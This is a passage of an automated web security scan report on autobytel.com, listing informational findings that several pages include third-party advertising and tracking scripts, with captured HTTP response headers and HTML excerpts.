F09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=160x600;ptile=2;!cat=;ord=41947522?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||477FCF09-E384-D16D-7CEA699CAF08908B|||13148|||;sz=160x600;ptile=2;!cat=;ord=41947522?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.528. http://www.autobytel.com/content/home/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=728x90;ptile=1;!cat=;ord=31515196?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=1x3;!cat=;ord=31515196?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

21.529. http://www.autobytel.com/content/home/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=728x90;ptile=1;!cat=;ord=76448835?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=160x600;ptile=2;!cat=;ord=76448835?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=1x3;!cat=;ord=76448835?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=728x90;ptile=1;!cat=;ord=76448835?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=728x90;ptile=1;!cat=;ord=76448835?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=1x3;!cat=;ord=76448835?"></script>
...[SNIP]...
B31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=160x600;ptile=2;!cat=;ord=76448835?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=160x600;ptile=2;!cat=;ord=76448835?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.530. http://www.autobytel.com/content/home/help/index.cfm/action/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=728x90;ptile=1;!cat=;ord=71799946?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=160x600;ptile=2;!cat=;ord=71799946?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=1x3;!cat=;ord=71799946?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:11 GMT
Content-Length: 32321
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
B659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=728x90;ptile=1;!cat=;ord=71799946?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=728x90;ptile=1;!cat=;ord=71799946?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=1x3;!cat=;ord=71799946?"></script>
...[SNIP]...
59F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=160x600;ptile=2;!cat=;ord=71799946?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=160x600;ptile=2;!cat=;ord=71799946?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.531. http://www.autobytel.com/content/home/help/index.cfm/action/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=728x90;ptile=1;!cat=;ord=97281516?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=160x600;ptile=2;!cat=;ord=97281516?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=1x3;!cat=;ord=97281516?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36606

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=728x90;ptile=1;!cat=;ord=97281516?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=728x90;ptile=1;!cat=;ord=97281516?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=1x3;!cat=;ord=97281516?"></script>
...[SNIP]...
DC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=160x600;ptile=2;!cat=;ord=97281516?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=160x600;ptile=2;!cat=;ord=97281516?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.532. http://www.autobytel.com/content/home/help/index.cfm/action/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=728x90;ptile=1;!cat=;ord=32969344?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=160x600;ptile=2;!cat=;ord=32969344?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=1x3;!cat=;ord=32969344?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 55317
Expires: Mon, 24 Jan 2011 23:37:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:03 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
EC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=728x90;ptile=1;!cat=;ord=32969344?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=728x90;ptile=1;!cat=;ord=32969344?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=1x3;!cat=;ord=32969344?"></script>
...[SNIP]...
4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=160x600;ptile=2;!cat=;ord=32969344?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=160x600;ptile=2;!cat=;ord=32969344?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.533. http://www.autobytel.com/content/home/help/index.cfm/action/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=728x90;ptile=1;!cat=;ord=47110988?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=160x600;ptile=2;!cat=;ord=47110988?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=1x3;!cat=;ord=47110988?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54679

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=728x90;ptile=1;!cat=;ord=47110988?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=728x90;ptile=1;!cat=;ord=47110988?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=1x3;!cat=;ord=47110988?"></script>
...[SNIP]...
FCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=160x600;ptile=2;!cat=;ord=47110988?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=160x600;ptile=2;!cat=;ord=47110988?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.534. http://www.autobytel.com/content/home/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?
http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

21.535. http://www.autobytel.com/content/home/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=597x90;ord=26445606?
http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=369x78;!cat=;ord=26445606?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
8;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=369x78;!cat=;ord=26445606?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=369x78;!cat=;ord=26445606?">
   </script>
...[SNIP]...
13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=586x90;ord=26445606?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=13148;u=|||47EDDE5A-B3C1-504D-453A672BB115DAA2|||13148|||;sz=597x90;ord=26445606?">
       </script>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.536. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=728x90;ptile=1;!cat=;ord=18074096?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=160x600;ptile=2;!cat=;ord=18074096?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=1x3;!cat=;ord=18074096?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
21496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=728x90;ptile=1;!cat=;ord=18074096?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=728x90;ptile=1;!cat=;ord=18074096?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=1x3;!cat=;ord=18074096?"></script>
...[SNIP]...
496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=160x600;ptile=2;!cat=;ord=18074096?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47821496-0805-48F3-C006B68D5E3EF5A1|||13148|||;sz=160x600;ptile=2;!cat=;ord=18074096?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.537. http://www.autobytel.com/content/research/article/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=728x90;ptile=1;!cat=;ord=92160000?
http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=160x600;ptile=2;!cat=;ord=92160000?
http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47767972-B019-F977-06DCEC36CE17C543|||13148|||;sz=1x3;!cat=;ord=92160000?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
